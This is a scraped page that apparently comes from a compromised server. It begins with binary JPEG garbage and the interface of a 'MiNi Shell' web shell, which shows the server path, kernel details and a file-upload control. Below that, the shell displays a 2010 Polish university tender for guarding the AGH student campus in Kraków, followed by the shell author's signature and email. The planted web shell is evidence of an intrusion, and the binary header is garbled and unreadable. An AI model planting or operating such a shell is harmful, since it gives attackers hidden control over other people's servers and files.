JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100531/140229-N-2010.html

<p class="kh_header"><b>Kraków: Ochrona terenu Miasteczka Studenckiego AGH w Krakowie- ZP/0270/2010</b><br>
<b>Numer ogłoszenia: 140229 - 2010; data zamieszczenia: 31.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Górniczo - Hutnicza im. Stanisława Staszica , Al. Mickiewicza 30, 30-059 Kraków, woj. małopolskie, tel. 012 6173595, faks (012) 6173595, 6173363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.agh.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona terenu Miasteczka Studenckiego AGH w Krakowie- ZP/0270/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje ochronę terenu i obiektów Miasteczka Studenckiego AGH w Krakowie w rejonie ulic: Reymonta, Nawojki, Armii Krajowej i Piastowskiej (załącznik nr 8 - mapa terenu) poprzez obsługę Centrum Monitorowania MS AGH oraz przy użyciu patrolu samochodowego i zespołu interwencyjnego.
I. Obsługa Centrum Monitorowania MS  AGH
Miejsce pracy:  Centrum Monitorowania MS zlokalizowane w Domu Studenckim nr 8 Stokrotka  przy ul. Rostafińskiego 2.
Okres realizacji zamówienia: 	od godz. 8:00 w dniu 01-07-2010 r. do godz. 8:00 w dniu 01-07-2011 r.
Ilość osób realizujących usługi monitorowania na jednej zmianie: 	1
Ilość godzin pracy na dobę: 24 
Czas pracy: wszystkie dni tygodnia.
Ilość zamontowanych kamer do monitorowania terenu: 14 obrotowych, 18 stacjonarnych.
Ilość zamontowanych kamer monitorujących wejścia do domów studenckich: 50 stacjonarnych.
Zakres obowiązków osoby realizującej usługę monitorowania
1.	Kierowanie działaniami załóg interwencyjnych, patroli samochodowych i pieszych,
2.	Obsługa urządzeń rejestrujących obrazy z kamer umieszczonych na terenie MS oraz monitorujących instalacje ppoż. w Domach Studenckich.
3.	Prowadzenie archiwum nagrań oraz wszelkiej dokumentacji związanej z udostępnianiem ich Policji oraz zainteresowanym osobom zgodnie z instrukcją postępowania w tym zakresie.
4.	Zgłaszanie wszelkich usterek w pracy urządzeń monitoringu, współdziałanie z firmą konserwującą w zakresie napraw i konserwacji oraz obsługi urządzeń.
5.	Dbanie o ład i porządek w miejscu pracy oraz prawidłowe przechowywanie dokumentacji.
6.	Przyjmowanie zgłoszeń o przypadkach zakłócenia porządku i dyscypliny na chronionym obszarze i reagowanie stosownie do zaistniałej sytuacji,
7.	Reagowanie na każdy sygnał zakłócenia bezpieczeństwa mieszkańców MS oraz zagrożenia życia lub mienia poprzez:
-		natychmiastowe wzywanie służb ratunkowych oraz policji, załóg interwencyjnych,
-	informowanie o zaistniałych zagrożeniach i podjętych działaniach administracje MS.
8.	Zapobieganie sytuacjom zagrażającym bezpieczeństwu poprzez natychmiastowe reagowanie na zauważone na ekranie próby dewastacji mienia, kradzieży, włamania - powiadamianie pracowników Wykonawcy pełniących dyżur w patrolach na terenie MS AGH, wezwanie załogi interwencyjnej lub  policji.
9.	Prowadzenie dokładnych raportów z przebiegu służby, z odnotowaniem godziny zdarzenia oraz podjętych działaniach.
10.	Obsługa bazy ewidencji pojazdów użytkowanych przez mieszkańców MS AGH.
11.	Współdziałanie z portierami pełniącymi dyżury w domach studenckich w zakresie bezpieczeństwa, odnotowywanie w raportach sytuacji zakłócenia porządku i dyscypliny, zagrożenia życia lub mienia oraz rodzaju udzielonej pomocy.
12.	Zawiadamianie odpowiednich służb technicznych o zauważonych awariach sieci wodociągowej, kanalizacyjnej, alarmach ppoż. i innych.
13.	Pełne współdziałanie z patrolami i załogami interwencyjnymi, przekazywanie administracji MS sporządzanych raportów z przeprowadzonych interwencji na terenie MS.
14.	Wykonywanie innych poleceń Dyrekcji MS w zakresie zapewnienia bezpieczeństwa mieszkańcom MS oraz udaremniania wszelkich prób kradzieży, dewastacji lub włamań.
15.	Informowanie Dyrekcji MS o sposobie załatwienia spraw wynikłych podczas pełnienia dyżurów oraz o ewentualnie napotkanych trudnościach.
16.	Współdziałanie z Państwową Strażą Pożarną, portierami pełniącymi dyżur w domach studenckich oraz stacją bazową ppoż. w zakresie monitorowania instalacji sygnalizacji pożaru w Domach Studenckich. 
17.	Ponoszenie pełnej odpowiedzialności materialnej za powierzony sprzęt i mienie.
Ponadto osoby realizujące zamówienie  zobowiązani są do:
1.	pozostawania w miejscu pracy przez cały okres służby - obowiązuje zakaz opuszczania miejsca pracy, 
2.	dbanie o mienie AGH oraz zgłaszanie przełożonym wszelkich prób jej naruszenia.
3.	pozostania na swoim stanowisku do czasu objęcia służby przez następcę. 
4.	dbanie o estetyczną prezencję osobistą, utrzymywanie estetycznego wyglądu zajmowanych pomieszczeń, pełnienia służby w umundurowaniu firmowym oraz noszenie identyfikatorów osobistych.
5.	podporządkowania się dodatkowym i okresowym zarządzeniom wewnętrznym Uczelni,
6.	bezwzględne stosowanie się do zakazu palenia tytoniu w pomieszczeniach AGH.
Za udokumentowane nieprawidłowości w czasie pełnieniu dyżurów, stwierdzone przez Kierownictwo Miasteczka Studenckiego AGH,  należne wynagrodzenie zostanie zmniejszone stosownie do nieprzepracowanego czasu pracy, po wcześniejszym uzgodnieniu z kierownictwem Wykonawcy.  
Uwaga:
1.	Pracownicy skierowani do pracy winni posiadać licencję pracownika ochrony II stopnia.
2.	Istnieje możliwość obejrzenia, po wcześniejszym zgłoszeniu, Centrum Monitorowania MS AGH i zainstalowanych tam urządzeń codziennie od godz. 8:00 do 15:00.
3.	Zamawiający dopuszcza możliwość rozbudowy Centrum Monitoringu o dodatkowe urządzenia monitorujące teren MS AGH.

II.	Patrol samochodowy
Zakres ochrony:  teren i obiekty Miasteczka Studenckiego AGH w Krakowie w rejonie ulic: Reymonta, Nawojki, Armii Krajowej i Piastowskiej 
Okres realizacji zamówienia: 	od godz.20:00 w dniu 01-10-2010 r. do godz. 4:00 w dniu 01-07-2011 r. 
W miesiącach lipcu, sierpniu i wrześniu patrolowanie z użyciem samochodu nie będzie prowadzone. 
Ilość dwuosobowych patroli samochodowych: 1
Czas pracy: wszystkie dni tygodnia.
Godziny pracy patrolu: od 20:00 do 4:00 (8 godzin dziennie) 
Zamawiający zastrzega sobie prawo do zmiany wielkości zamówienia po uprzednim zgłoszeniu tego faktu:
-	rezygnacja z patrolu może mieć miejsce w okresie:
-	od 30 października do 2 listopada 2010 r.- maksimum do 7 dni
-	od 24 do 28 grudnia 2010 r. - maksimum do 7  dni
-	od 23 do 26 kwietnia 2011 r. - maksimum do 7 dni
-	od 1 do 3 maja 2011 r. - maksimum do 7  dni 
-	wystąpienie do Wykonawcy w całym okresie obowiązywania umowy o dodatkowy patrol może mieć miejsce w okresie zwiększonego zagrożenia bezpieczeństwa w przypadku zorganizowania nieprzewidzianych obecnie imprez na terenie Miasteczka Studenckiego - maksimum do 30  dni
Osoby upoważnione przez Wykonawcę, a znane wcześniej Zamawiającemu, zobowiązane są do przeprowadzania kontroli pracowników pełniących dyżury i odnotowanie tego faktu wraz z uwagami w książce raportów.
Za nieprawidłowości w pełnieniu dyżurów stwierdzone i udokumentowane przez Kierownictwo MS AGH, należne wynagrodzenie zostanie zmniejszone stosownie do nieprzepracowanego czasu pracy, po wcześniejszym uzgodnieniu z kierownictwem Wykonawcy.  
Zamawiający wymagać będzie pełnej współpracy pracowników Wykonawcy z Kierownictwem MS AGH i pracownikami pełniącymi dyżur w Centrum Monitoringu MS..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie obowiązuje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania specjalnych uprawnień tj. 
Koncesji MSWiA (Dz.U. 05.145.1221) na prowadzenie działalności związanej z ochroną osób i mienia realizowaną w formie bezpośredniej ochrony fizycznej.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonej do oferty koncesji, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie zrealizował, bądź realizuje nadal, co najmniej 
2 (dwa) zamówienia na kwotę nie mniejszą niż 150.000,- złotych każde, odpowiadające swoim rodzajem  usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania oraz odbiorców oraz z załączeniem dokumentów potwierdzających, że prace te (usługi) zostały wykonane lub są wykonywane należycie.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu usług, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do realizacji zamówienia Wykonawca musi dysponować:
1) bazą całodobowego monitorowania i kierowania, 
2) minimum 2 samochodami oznakowanymi jako pojazdy ochrony w sposób charakterystyczny dla Wykonawcy.  
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu narzędzi, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować:
1).  minimum 2 grupami  interwencyjnymi dostępnymi przez całą dobę. 
2). minimum 4 osobami do pracy w Centrum Monitoringu, posiadającymi licencję pracownika ochrony II stopnia
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu osób, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz Oferty.
Szczegółowe zasady realizacji zamówienia w tym:
1.Instrukcja Działania osób realizujących usługę monitorowania Centrum Monitoringu,
2.Instrukcja Działania Patrolu Samochodowego
3.Instrukcja Działania Patrolu Pieszego,
4.Instrukcja Działania Załogi Interwencyjnej,
5.Instrukcja współpracy osób realizujących usługę monitorowania z pracownikami Zamawiającego pracującymi na portierniach
Wypełniony Arkusz kalkulacyjny
Wykaz części zamówienia,  które zostaną  wykonane przez podwykonawców (jeżeli Wykonawca przewiduje ich udział)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Proponowany sposób działania Wykonawcy - 5</li>
<li>3 - Ocena Wykonawcy - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić tylko za zgodą obu stron wyrażoną na piśmie w postaci kolejnych aneksów, pod rygorem nieważności.

1.	Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust 3 ustawy Prawo zamówień publicznych stanowiącego, że umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ.  
2.	Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w następującym zakresie: zmian godzin i dni pełnionych dyżurów oraz ilości osób realizujących usługę monitorowania realizujących w danym dniu usługę, przy czym zmiana taka może być spowodowana:
-	okresowym wzrostem zagrożenia bezpieczeństwa na terenie Miasteczka Studenckiego AGH,
-	okresowym znaczącym zmniejszeniem liczby mieszkańców Miasteczka Studenckiego
-	zwiększenia ilości kamer monitoringowych na terenie Miasteczka Studenckiego
 pod warunkiem, że zmiany wskazane powyżej nie spowodują zwiększenia kwoty umowy. 
3.	Warunkiem dokonania zmian, o których mowa w ust. 2 jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy.  
4.	Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod  rygorem nieważności takiej zmiany.
1.	Zamawiający może odstąpić od umowy w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia zawiadamiając o tym Wykonawcę na piśmie w terminie 1 miesiąca od powzięcia wiadomości o powyższych okolicznościach.
2.	W przypadku, o którym mowa w ust. 3 postanowienia o karze umownej nie mają zastosowania; Wykonawca nie może żądać odszkodowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.agh.wdu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego pok. 117, paw. C-2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 11:00, miejsce: siedziba zamawiającego pok. 117, paw. C-2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com